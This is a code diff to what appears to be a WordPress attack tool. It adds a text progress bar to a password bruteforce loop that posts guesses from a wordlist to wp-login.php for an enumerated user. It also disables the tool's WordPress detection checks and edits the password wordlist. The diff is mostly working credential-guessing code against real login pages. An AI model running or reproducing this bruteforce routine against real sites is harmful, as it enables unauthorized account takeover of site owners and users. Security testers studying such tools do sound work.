Bruteforce indicator - progress bar

engine/brute.py

@@ -31,6 +31,9 @@ class Brute_Engine:
 					print info("User found "+ brute)
 					self.bruteforcing_pass(wordpress, brute)
 
+		# Exit after the bruteforce
+		exit()
+
 	"""
 	name        : bruteforcing_user(self, wordpress)
 	description :
@@ -56,11 +59,16 @@ class Brute_Engine:
 		print info("Starting passwords bruteforce for " + user)
 
 		with open('fuzz/wordlist.lst') as data_file:
-			data   = data_file.readlines()
+			data  = data_file.readlines()
+			size  = len(data)
+
+			for index, pwd in enumerate(data):
+				pwd     = pwd.strip()
+				data    = {"log": user, "pwd": pwd}
+				percent = int(float(index)/(size)*100)
+
+				print 'Bruteforcing - {}{}\r'.format( percent*"▓", (100-percent)*'░' ) ,
 
-			for pwd in data:
-				pwd = pwd.strip()
-				data = {"log":user, "pwd":pwd}
 				if not "The password you entered" in requests.post(wordpress.url + "wp-login.php", data=data).text:
-					print warning("Password found "+ pwd)
+					print warning("Password found for {} : {}{}".format(user,pwd, ' '*100))
 					break

engine/wordpress.py

@@ -21,8 +21,8 @@ class Wordpress:
 		self.random_agent()
 		self.clean_url()
 		self.is_up_and_installed()
-		self.is_wordpress()
-		self.is_readme()
+		#self.is_wordpress()
+		#self.is_readme()
 		self.is_debug_log()
 		self.is_backup_file()
 		self.is_xml_rpc()

fuzz/wordlist.lst

@@ -1,5 +1,4 @@
 123456
-password
 12345678
 1234
 pussy
@@ -24,6 +23,7 @@ abc123
 pass
 fuckme
 6969
+ER28-0652
 jordan
 harley
 ranger
@@ -502,3 +502,4 @@ phantom
 billy
 6666
 albert
+password